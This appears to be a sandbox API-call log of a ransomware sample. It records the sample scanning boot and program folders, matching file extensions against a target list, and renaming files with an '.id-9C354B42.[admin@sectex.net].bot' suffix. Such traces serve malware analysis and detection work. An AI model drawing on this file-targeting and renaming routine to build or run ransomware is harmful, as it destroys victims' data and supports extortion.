	[0137.955] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=90688) returned 1
	[0137.955] CloseHandle (hObject=0x2ec) returned 1
	[0137.956] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20
	[0137.956] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.956] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.956] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.956] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.956] lstrlenW (lpString=".doc") returned 4
	[0137.956] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.956] lstrlenW (lpString=".docx") returned 5
	[0137.956] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.956] lstrlenW (lpString=".pdf") returned 4
	[0137.956] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.956] lstrlenW (lpString=".xls") returned 4
	[0137.956] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.956] lstrlenW (lpString=".xlsx") returned 5
	[0137.956] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.956] lstrlenW (lpString=".ppt") returned 4
	[0137.956] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.956] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.956] lstrlenW (lpString=".zip") returned 4
	[0137.956] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.956] lstrlenW (lpString=".rar") returned 4
	[0137.956] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.956] lstrlenW (lpString=".bz2") returned 4
	[0137.956] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.956] lstrlenW (lpString=".7z") returned 3
	[0137.956] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.956] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.956] lstrlenW (lpString=".dbf") returned 4
	[0137.956] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString=".1cd") returned 4
	[0137.957] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString=".jpg") returned 4
	[0137.957] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString=".doc") returned 4
	[0137.957] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.957] lstrlenW (lpString=".docx") returned 5
	[0137.957] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.957] lstrlenW (lpString=".pdf") returned 4
	[0137.957] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.957] lstrlenW (lpString=".xls") returned 4
	[0137.957] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.957] lstrlenW (lpString=".xlsx") returned 5
	[0137.957] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.957] lstrlenW (lpString=".ppt") returned 4
	[0137.957] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString=".zip") returned 4
	[0137.957] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.957] lstrlenW (lpString=".rar") returned 4
	[0137.957] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.957] lstrlenW (lpString=".bz2") returned 4
	[0137.957] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.957] lstrlenW (lpString=".7z") returned 3
	[0137.957] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.957] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.957] lstrlenW (lpString=".dbf") returned 4
	[0137.957] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.958] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.958] lstrlenW (lpString=".1cd") returned 4
	[0137.958] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.958] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0137.958] lstrlenW (lpString=".jpg") returned 4
	[0137.958] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.958] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.958] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.958] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.958] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=90704) returned 1
	[0137.958] CloseHandle (hObject=0x2ec) returned 1
	[0137.959] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20
	[0137.960] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.960] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.960] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.960] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.960] lstrlenW (lpString=".doc") returned 4
	[0137.960] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.960] lstrlenW (lpString=".docx") returned 5
	[0137.960] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.960] lstrlenW (lpString=".pdf") returned 4
	[0137.960] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.960] lstrlenW (lpString=".xls") returned 4
	[0137.960] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.960] lstrlenW (lpString=".xlsx") returned 5
	[0137.960] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.960] lstrlenW (lpString=".ppt") returned 4
	[0137.960] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.960] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.960] lstrlenW (lpString=".zip") returned 4
	[0137.960] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.960] lstrlenW (lpString=".rar") returned 4
	[0137.960] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.960] lstrlenW (lpString=".bz2") returned 4
	[0137.960] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.960] lstrlenW (lpString=".7z") returned 3
	[0137.960] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.960] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.960] lstrlenW (lpString=".dbf") returned 4
	[0137.960] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.960] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.960] lstrlenW (lpString=".1cd") returned 4
	[0137.961] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString=".jpg") returned 4
	[0137.961] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString=".doc") returned 4
	[0137.961] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.961] lstrlenW (lpString=".docx") returned 5
	[0137.961] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.961] lstrlenW (lpString=".pdf") returned 4
	[0137.961] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.961] lstrlenW (lpString=".xls") returned 4
	[0137.961] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.961] lstrlenW (lpString=".xlsx") returned 5
	[0137.961] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.961] lstrlenW (lpString=".ppt") returned 4
	[0137.961] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString=".zip") returned 4
	[0137.961] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.961] lstrlenW (lpString=".rar") returned 4
	[0137.961] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.961] lstrlenW (lpString=".bz2") returned 4
	[0137.961] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.961] lstrlenW (lpString=".7z") returned 3
	[0137.961] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString=".dbf") returned 4
	[0137.961] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.961] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.961] lstrlenW (lpString=".1cd") returned 4
	[0137.962] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.962] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0137.962] lstrlenW (lpString=".jpg") returned 4
	[0137.962] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.962] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.962] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.962] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.962] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=76352) returned 1
	[0137.962] CloseHandle (hObject=0x2ec) returned 1
	[0137.962] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20
	[0137.962] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.962] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.962] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.962] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".doc") returned 4
	[0137.963] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.963] lstrlenW (lpString=".docx") returned 5
	[0137.963] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.963] lstrlenW (lpString=".pdf") returned 4
	[0137.963] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.963] lstrlenW (lpString=".xls") returned 4
	[0137.963] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.963] lstrlenW (lpString=".xlsx") returned 5
	[0137.963] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.963] lstrlenW (lpString=".ppt") returned 4
	[0137.963] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".zip") returned 4
	[0137.963] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.963] lstrlenW (lpString=".rar") returned 4
	[0137.963] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.963] lstrlenW (lpString=".bz2") returned 4
	[0137.963] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.963] lstrlenW (lpString=".7z") returned 3
	[0137.963] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".dbf") returned 4
	[0137.963] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".1cd") returned 4
	[0137.963] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".jpg") returned 4
	[0137.963] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.963] lstrlenW (lpString=".doc") returned 4
	[0137.963] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.964] lstrlenW (lpString=".docx") returned 5
	[0137.964] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.964] lstrlenW (lpString=".pdf") returned 4
	[0137.964] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.964] lstrlenW (lpString=".xls") returned 4
	[0137.964] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.964] lstrlenW (lpString=".xlsx") returned 5
	[0137.964] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.964] lstrlenW (lpString=".ppt") returned 4
	[0137.964] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.964] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.964] lstrlenW (lpString=".zip") returned 4
	[0137.964] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.964] lstrlenW (lpString=".rar") returned 4
	[0137.964] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.964] lstrlenW (lpString=".bz2") returned 4
	[0137.964] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.964] lstrlenW (lpString=".7z") returned 3
	[0137.964] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.964] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.964] lstrlenW (lpString=".dbf") returned 4
	[0137.964] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.964] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.964] lstrlenW (lpString=".1cd") returned 4
	[0137.964] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.964] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0137.964] lstrlenW (lpString=".jpg") returned 4
	[0137.964] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.964] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.964] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.965] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.965] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=75344) returned 1
	[0137.965] CloseHandle (hObject=0x2ec) returned 1
	[0137.965] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20
	[0137.965] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.965] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.965] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.965] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.965] lstrlenW (lpString=".doc") returned 4
	[0137.965] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.965] lstrlenW (lpString=".docx") returned 5
	[0137.965] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.965] lstrlenW (lpString=".pdf") returned 4
	[0137.965] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.965] lstrlenW (lpString=".xls") returned 4
	[0137.965] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.965] lstrlenW (lpString=".xlsx") returned 5
	[0137.965] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.965] lstrlenW (lpString=".ppt") returned 4
	[0137.966] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString=".zip") returned 4
	[0137.966] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.966] lstrlenW (lpString=".rar") returned 4
	[0137.966] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.966] lstrlenW (lpString=".bz2") returned 4
	[0137.966] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.966] lstrlenW (lpString=".7z") returned 3
	[0137.966] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString=".dbf") returned 4
	[0137.966] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString=".1cd") returned 4
	[0137.966] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString=".jpg") returned 4
	[0137.966] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.966] lstrlenW (lpString=".doc") returned 4
	[0137.966] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.966] lstrlenW (lpString=".docx") returned 5
	[0137.966] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.966] lstrlenW (lpString=".pdf") returned 4
	[0137.966] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.966] lstrlenW (lpString=".xls") returned 4
	[0137.966] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.966] lstrlenW (lpString=".xlsx") returned 5
	[0137.966] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.966] lstrlenW (lpString=".ppt") returned 4
	[0137.967] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.967] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.967] lstrlenW (lpString=".zip") returned 4
	[0137.967] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.967] lstrlenW (lpString=".rar") returned 4
	[0137.967] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.967] lstrlenW (lpString=".bz2") returned 4
	[0137.967] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.967] lstrlenW (lpString=".7z") returned 3
	[0137.967] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.967] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.967] lstrlenW (lpString=".dbf") returned 4
	[0137.967] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.967] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.967] lstrlenW (lpString=".1cd") returned 4
	[0137.967] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.967] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0137.967] lstrlenW (lpString=".jpg") returned 4
	[0137.967] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.967] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0137.967] lstrlenW (lpString="memtest.exe") returned 11
	[0137.967] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.967] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=485760) returned 1
	[0137.968] CloseHandle (hObject=0x2ec) returned 1
	[0137.968] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20
	[0137.968] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.968] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.968] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19
	[0137.968] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19
	[0137.968] lstrlenW (lpString=".doc") returned 4
	[0137.968] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0137.968] lstrlenW (lpString=".docx") returned 5
	[0137.968] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1
	[0137.968] lstrlenW (lpString=".pdf") returned 4
	[0137.968] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0137.968] lstrlenW (lpString=".xls") returned 4
	[0137.968] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0137.968] lstrlenW (lpString=".xlsx") returned 5
	[0137.968] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1
	[0137.968] lstrlenW (lpString=".ppt") returned 4
	[0137.968] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0137.968] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19
	[0137.968] lstrlenW (lpString=".zip") returned 4
	[0137.968] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0137.968] lstrlenW (lpString=".rar") returned 4
	[0137.968] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0137.968] lstrlenW (lpString=".bz2") returned 4
	[0137.968] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0137.968] lstrlenW (lpString=".7z") returned 3
	[0137.968] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0139.543] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.548] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\omdbase.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.548] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\omdproject.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.548] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\pipeline.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.549] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\pipetran.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
